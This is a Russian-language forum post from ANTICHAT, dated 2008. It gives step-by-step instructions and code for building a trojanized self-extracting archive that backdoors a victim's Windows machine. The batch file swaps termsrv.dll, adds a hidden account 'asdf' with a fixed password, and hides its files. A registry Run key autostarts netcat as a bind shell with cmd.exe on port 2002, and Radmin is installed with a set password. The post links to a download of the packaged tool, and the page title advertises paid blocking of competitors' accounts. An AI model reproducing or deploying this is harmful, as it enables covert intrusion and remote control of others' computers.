УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > Безопасность и Уязвимости > Безопасность > Windows
3 в 1.nc,termsrv.dll,radmin

Опции темы

Поиск в этой теме

Опции просмотра

3 в 1.nc,termsrv.dll,radmin

16.02.2008, 22:36

onikishov

Участник форума

Регистрация: 25.03.2007

Сообщений: 184

Провел на форуме:
350617

Репутация: 183

3 в 1.nc,termsrv.dll,radmin

В один прекрасный моменты

я подумал, что было бы неплохо совместить эти 3 вещи. При запуске такого файла, что нибудь да сработает)
Итак поехали. Принцип старый. Просто подкиним к SFX архиву еще несколько файлов и поменяем 111.bat и 111.reg.
Дописываем bat

Код:

ren %SystemRoot%\system32\DLLCache\termsrv.dll termsrv.old
ren %SystemRoot%\system32\termsrv.dll termsrv.old
copy %SystemRoot%\help\123\termsrv.dll %SystemRoot%\system32\DLLCache\termsrv.dll
copy %SystemRoot%\help\123\termsrv.dll %SystemRoot%\system32\termsrv.dll
reg import key.reg
del %SystemRoot%\system32\DLLCache\termsrv.old
del %SystemRoot%\system32\termsrv.old
del %SystemRoot%\help\123\termsrv.dll
del %SystemRoot%\help\123\key.reg
net user asdf 1234 /add /expires:never /times:all
net localgroup "Ђ¤¬Ё*Ёбва*в®ал" asdf /add
del %SystemRoot%\help\123\run.cmd
attrib +r +h +s C:\Windows\Help\123\*
attrib +r +h +s C:\Windows\Help\123

Последние две строчки присваивают папке 123 и ее файлам параметры: скрытый, только чтение, системный

Дописываем reg

Код:

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"nc.exe"="\"C:\\Windows\\Help\\123\\nc.exe.lnk\""

Эти строки отвечают за автозапуск nc.
Создадим ярлычок nc.exe и допишим там пару букв:

Цитата:

-d -L -n -e cmd.exe -v -p 2002

Ну и все осталось завернуть)м... Даже ico прилепим

Итого мы получили: У жертвы открыт 2002 порт, открыт удаленный доступ(пользователь:asdf, пароль:1234), стоит радмин(пароль 11223344).

Качаем ТУТ
Пароль: antichat.ru

Последний раз редактировалось onikishov; 16.02.2008 в 22:46..

« Предыдущая тема | Следующая тема »

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход